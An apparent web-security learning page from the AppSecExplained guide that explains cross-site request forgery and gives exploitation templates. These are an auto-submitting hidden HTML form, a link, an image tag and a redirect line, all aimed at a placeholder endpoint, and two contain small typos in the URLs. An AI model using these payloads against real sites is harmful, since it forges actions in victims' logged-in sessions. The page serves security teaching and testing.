AppSecExplained
  • Index < START HERE
    • My courses
    • How to get started from zero
  • 📽️Live Stream Content
    • Resource of the week
  • Discovery / Recon
    • Methodology
    • Content discovery / recon
      • Subdomains
      • Endpoints
      • Parameters
      • Spidering
  • Common vulns
    • SQL injection overview
      • Detection
      • Blind SQLi
      • Second-order SQLi
      • SQLi lab setup & writeups
    • NoSQL injection
    • JavaScript injection (XSS)
      • XSS Methodology
    • File Inclusion
      • Local file inclusion
        • Directory traversal
    • Command injection
    • XXE (XML external entity) injection
      • Blind XXE
    • Template injection
      • Server-side template injection
      • Client-side template injection
    • Authentication
      • Attacking password-based authentication
      • Attacking MFA
      • Authentication lab setup & writeups
    • Cross-Site Request Forgery (CSRF)
    • Insecure deserialization
      • PHP
      • Java
      • Python
      • .NET
    • Server-side request forgery (SSRF)
    • Insecure file upload
    • Clickjacking
    • Open redirect
    • Vulnerable components
    • Race conditions
      • Limit overrun
    • Prototype pollution
      • Client-side prototype pollution
    • APIs
      • API: BOLA
      • API: Broken authentication
      • BOPLA
      • API: BFLA
  • Bypassing controls
    • Rate limiting
    • WAF Bypasses
  • Scripts
    • Docker-compose.yml files
      • Wordpress
      • SQLi testing labs
    • PHP scripts
      • RCE Function Check
    • Wordlists
      • Single characters
      • SQLi
  • Code review
    • Getting started
    • Sinks
  • Links worth your time
    • Practical API Hacking
    • Rana Khalil's Web Security Academy Course
    • Portswigger's Web Security Academy
    • TCM Security Discord
    • PentesterLand Writeups
Powered by GitBook
On this page
  • What is it?
  • Checklist
  • Exploitation

Was this helpful?

  1. Common vulns

Cross-Site Request Forgery (CSRF)

PreviousAuthentication lab setup & writeupsNextInsecure deserialization

Last updated 1 year ago

Was this helpful?

What is it?

CSRF, short for Cross-site request forgery, is a type of web security flaw that enables an attacker to trick users into executing actions they didn't intend to do.

A simple example:

  • A vulnerable web application has the endpoint /updateProfile?id={userid}

  • When a POST request is made to this endpoint the application:

    • Checks the ID is the current user

    • If it is, update the profile with the provided information in the request body

  • When the victim visits the attacker's malicious site, it will:

    • Send a request to the vulnerable web application

    • Because the user is logged into that application, the browser will include cookies (importantly, the session cookie)

  • The vulnerable application processes the request as normal since it came from the user

It's important to note that we need some user interaction for CSRF to work. Typically an attacker would place their payload on a site that they control, and try to entice the target with phishing emails, direct messages on social media, etc. Once the user clicks the link and lands on the page, the payload is triggered.

CSRF defences are now pretty common, so along with just finding places where users can carry out actions, we also need to be able to bypass defences that have not been properly implemented.

Other learning resources:

  • PortSwigger: Web Security Academy

  • The XSS Rat: Bug Bounty Beginner Methodology: CSRF

  • Swisskeyrepo:

Writeups:

Checklist

Exploitation

<!-- original payload generated from BURP Suite Pro -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<target-site>/api/employees/add" method=POST>
      <input type="hidden" name="name" value="<payload-info>" />
      <input type="hidden" name="email" value="<payload-info>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
<!-- requires user interaction -->
<a href="http://<target-site>m/api/employees/add?name=<payload-info>">Click Me</a>
<!-- doesn't require user interaction -->
<img src="http:/<target-site>/api/employees/add?name=<payload-info>">
document.location = 'https://<target-site>/employees/add?name=<payload-info>';
https://portswigger.net/web-security/csrf
https://www.youtube.com/watch?v=uirJsgvN7Hc
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md